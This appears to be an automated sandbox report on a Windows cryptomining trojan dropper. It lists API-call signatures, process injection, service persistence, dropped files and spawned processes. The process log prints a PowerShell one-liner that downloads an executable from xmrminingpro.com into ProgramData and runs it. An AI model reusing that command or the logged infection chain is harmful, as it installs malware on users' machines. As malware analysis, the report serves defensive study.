Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 46.30.215.96 80Jump to behavior
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Win.exeJump to dropped file
Sample or dropped binary is a compiled AutoHotkey binaryShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeWindow found: window name: AutoHotkeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeWindow found: window name: AutoHotkey
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeMemory allocated: 77580000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeMemory allocated: 776A0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeMemory allocated: 77580000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeMemory allocated: 776A0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeMemory allocated: 77580000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeMemory allocated: 776A0000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exeMemory allocated: 77580000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exeMemory allocated: 776A0000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exeMemory allocated: 77580000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exeMemory allocated: 776A0000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exeMemory allocated: 77580000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exeMemory allocated: 776A0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeMemory allocated: 77580000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeMemory allocated: 776A0000 page execute and read and write
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_000000014000B810 NtdllDefWindowProc_W,0_2_000000014000B810
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_0000000140003BA4 NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW,0_2_0000000140003BA4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED78C0 RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,NtClose,9_1_00ED78C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED2DD0 GetLastError,NtOpenSection,NtMapViewOfSection,9_1_00ED2DD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED3580 NtCreateFile,NtCreateFile,9_1_00ED3580
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED3B00 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,9_1_00ED3B00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED6710 GetModuleFileNameW,RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,NtClose,VirtualAlloc,NtClose,NtReadFile,NtClose,VirtualFree,NtClose,RtlDosPathNameToNtPathName_U,VirtualFree,NtCreateFile,NtWriteFile,NtClose,VirtualFree,NtClose,VirtualFree,DeleteFileW,9_1_00ED6710
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED34E0 NtCreateFile,9_1_00ED34E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED4DF0 CreateProcessW,NtQueryInformationProcess,GetCurrentProcess,GetThreadContext,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,GetCurrentProcess,VirtualAlloc,ReadProcessMemory,VirtualFree,VirtualFree,GetProcAddress,Sleep,VirtualAlloc,VirtualFree,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,9_1_00ED4DF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED39B0 NtClose,9_1_00ED39B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED3640 RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,VirtualAlloc,NtReadFile,NtClose,VirtualFree,NtClose,VirtualFree,NtClose,9_1_00ED3640
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED7A40 NtOpenProcess,NtTerminateProcess,NtClose,9_1_00ED7A40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED6C40 RtlDosPathNameToNtPathName_U,NtCreateFile,9_1_00ED6C40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED7B40 NtOpenProcess,GetExitCodeProcess,NtClose,NtClose,9_1_00ED7B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED2920 RtlImageNtHeader,NtOpenProcess,NtClose,NtAllocateVirtualMemory,VirtualAlloc,GetProcAddress,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,RtlCreateUserThread,NtWaitForSingleObject,GetExitCodeThread,NtClose,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtClose,9_1_00ED2920
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED3A20 NtCreateFile,NtWriteFile,NtClose,NtClose,9_1_00ED3A20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED6B00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,9_1_00ED6B00
Contains functionality to communicate with device driversShow sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7774C: wcscpy,CreateFileW,CloseHandle,CreateDirectoryW,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,5_1_000000013FE7774C
Contains functionality to delete servicesShow sources
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: 12_2_00401B19 GetModuleFileNameA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,OpenSCManagerA,CreateServiceA,LoadStringA,CloseServiceHandle,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,MessageBoxA,LoadStringA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateThread,StartServiceCtrlDispatcherA,LoadStringA,LoadStringA,MessageBoxA,12_2_00401B19
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00454A60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,6_2_00454A60
Creates files inside the system directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeMutant created: \Sessions\1\BaseNamedObjects\e634df069f8104f8cca5
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_0000000140003CB00_2_0000000140003CB0
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_00000001400060CC0_2_00000001400060CC
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_1_000000014000F4B00_1_000000014000F4B0
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE78EBC5_1_000000013FE78EBC
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE8EE085_1_000000013FE8EE08
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE8DCCC5_1_000000013FE8DCCC
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE71AB05_1_000000013FE71AB0
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9099C5_1_000000013FE9099C
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE728B45_1_000000013FE728B4
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7774C5_1_000000013FE7774C
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9E7605_1_000000013FE9E760
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE84F145_1_000000013FE84F14
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE746C45_1_000000013FE746C4
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE976905_1_000000013FE97690
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE856505_1_000000013FE85650
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7CD345_1_000000013FE7CD34
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7ED105_1_000000013FE7ED10
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE805085_1_000000013FE80508
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9EC305_1_000000013FE9EC30
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE9C4245_1_000000013FE9C424
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE734145_1_000000013FE73414
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE89BB45_1_000000013FE89BB4
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE963605_1_000000013FE96360
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7F2A85_1_000000013FE7F2A8
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE742AC5_1_000000013FE742AC
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE892645_1_000000013FE89264
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE992685_1_000000013FE99268
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE852485_1_000000013FE85248
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE859CC5_1_000000013FE859CC
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE8A8D85_1_000000013FE8A8D8
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7E8BC5_1_000000013FE7E8BC
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FEA28285_1_000000013FEA2828
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE760085_1_000000013FE76008
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7F7F85_1_000000013FE7F7F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004013846_2_00401384
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0048C0906_2_0048C090
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004940A56_2_004940A5
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004901676_2_00490167
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004331206_2_00433120
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004801E56_2_004801E5
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0041E1F06_2_0041E1F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004581B06_2_004581B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0048727E6_2_0048727E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004422906_2_00442290
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004804556_2_00480455
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004824006_2_00482400
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0049B56D6_2_0049B56D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0041A5B06_2_0041A5B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004976886_2_00497688
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004407006_2_00440700
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0043D7C06_2_0043D7C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004168406_2_00416840
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004308406_2_00430840
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0047F8DB6_2_0047F8DB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004388906_2_00438890
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0041C8B06_2_0041C8B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0040D9B06_2_0040D9B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00404AE06_2_00404AE0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0041FAB06_2_0041FAB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0043BAB06_2_0043BAB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00497BD96_2_00497BD9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00412BF06_2_00412BF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0041EC306_2_0041EC30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0047CCF06_2_0047CCF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00446C906_2_00446C90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0049CCB06_2_0049CCB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00498D256_2_00498D25
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00473DD06_2_00473DD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0042CDA06_2_0042CDA0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0049AE916_2_0049AE91
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00406F706_2_00406F70
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: String function: 00ED2F10 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 0048E247 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 00474580 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 00492450 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 0048D9F9 appears 375 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 0042E400 appears 185 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 00474620 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 0042E140 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: String function: 004991F0 appears 38 times
PE file contains strange resourcesShow sources
Source: Win.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Win.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cudart64_80.dll.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cudart64_80.dll.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cudart64_80.dll.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\notepad.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample file is different than original file name gathered from version infoShow sources
Source: iaejSdZgD3.exe, 00000000.00000002.14291565563.0000000001BF0000.00000008.sdmpBinary or memory string: originalfilename vs iaejSdZgD3.exe
Source: iaejSdZgD3.exe, 00000000.00000002.14291565563.0000000001BF0000.00000008.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs iaejSdZgD3.exe
Source: iaejSdZgD3.exe, 00000000.00000002.14291590518.0000000001C10000.00000008.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs iaejSdZgD3.exe
Source: iaejSdZgD3.exe, 00000000.00000002.14291318043.0000000000610000.00000002.sdmpBinary or memory string: System.OriginalFileName vs iaejSdZgD3.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeFile read: C:\Users\user\Desktop\iaejSdZgD3.exeJump to behavior
Tries to load missing DLLsShow sources
Source: C:\ProgramData\Win.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\ProgramData\Win.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\ProgramData\Win.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\ProgramData\Win.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\ProgramData\Win.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@25/79@2/3
Contains functionality for error loggingShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0042EF10 __wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,CreateProcessW,CloseHandle,CloseHandle,GetLastError,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,GetLastError,FormatMessageW,6_2_0042EF10
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00454A60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,6_2_00454A60
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0043E600 _wcsncpy,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,6_2_0043E600
Contains functionality to create servicesShow sources
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: GetModuleFileNameA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,OpenSCManagerA,CreateServiceA,LoadStringA,CloseServiceHandle,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,MessageBoxA,LoadStringA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateThread,StartServiceCtrlDispatcherA,LoadStringA,LoadStringA,MessageBoxA,12_2_00401B19
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeCode function: 9_1_00ED7680 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,9_1_00ED7680
Contains functionality to instantiate COM classesShow sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE8C9B8 CoCreateInstance,5_1_000000013FE8C9B8
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004762B0 SystemParametersInfoW,LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW,6_2_004762B0
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: 12_2_00401B19 GetModuleFileNameA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,OpenSCManagerA,CreateServiceA,LoadStringA,CloseServiceHandle,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,MessageBoxA,LoadStringA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateThread,StartServiceCtrlDispatcherA,LoadStringA,LoadStringA,MessageBoxA,12_2_00401B19
Contains functionality to register a service control handler (likely the sample is a service DLL)Show sources
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: 12_2_00401B19 GetModuleFileNameA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,OpenSCManagerA,CreateServiceA,LoadStringA,CloseServiceHandle,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,MessageBoxA,LoadStringA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateThread,StartServiceCtrlDispatcherA,LoadStringA,LoadStringA,MessageBoxA,12_2_00401B19
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinationsJump to behavior
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeFile created: C:\Users\user\AppData\Local\Temp\1Jump to behavior
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1\CAD2.tmp.bat C:\Users\user\Desktop\iaejSdZgD3.exe'
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: `.......pB...............iHJ......!......................................;GJ......................!.....................0......./........B......Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: H&(.....................[..J....xm...6..........`m(......................`.J.....'(.............................................................Jump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCommand line argument: /restart6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCommand line argument: /force6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCommand line argument: /ErrorStdOut6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCommand line argument: AutoHotkey6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCommand line argument: AutoHotkey6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCommand line argument: Clipboard6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCommand line argument: Clipboard6_2_00403A90
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: iaejSdZgD3.exevirustotal: Detection: 67%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\iaejSdZgD3.exe 'C:\Users\user\Desktop\iaejSdZgD3.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1\CAD2.tmp.bat C:\Users\user\Desktop\iaejSdZgD3.exe'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'
Source: unknownProcess created: C:\ProgramData\Win.exe c:\ProgramData\Win.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe 'C:\Users\user~1\AppData\Local\Temp\RarSFX0\setup.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\RarSFX0\run.bat' '
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe'
Source: unknownProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\qswGutmnEr\cfg'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe'
Source: unknownProcess created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-install'
Source: unknownProcess created: C:\ProgramData\playersclub\LaunchServ.exe C:\ProgramData\playersclub\LaunchServ.exe
Source: unknownProcess created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-start'
Source: unknownProcess created: C:\ProgramData\playersclub\systemSpawn.exe unknown
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
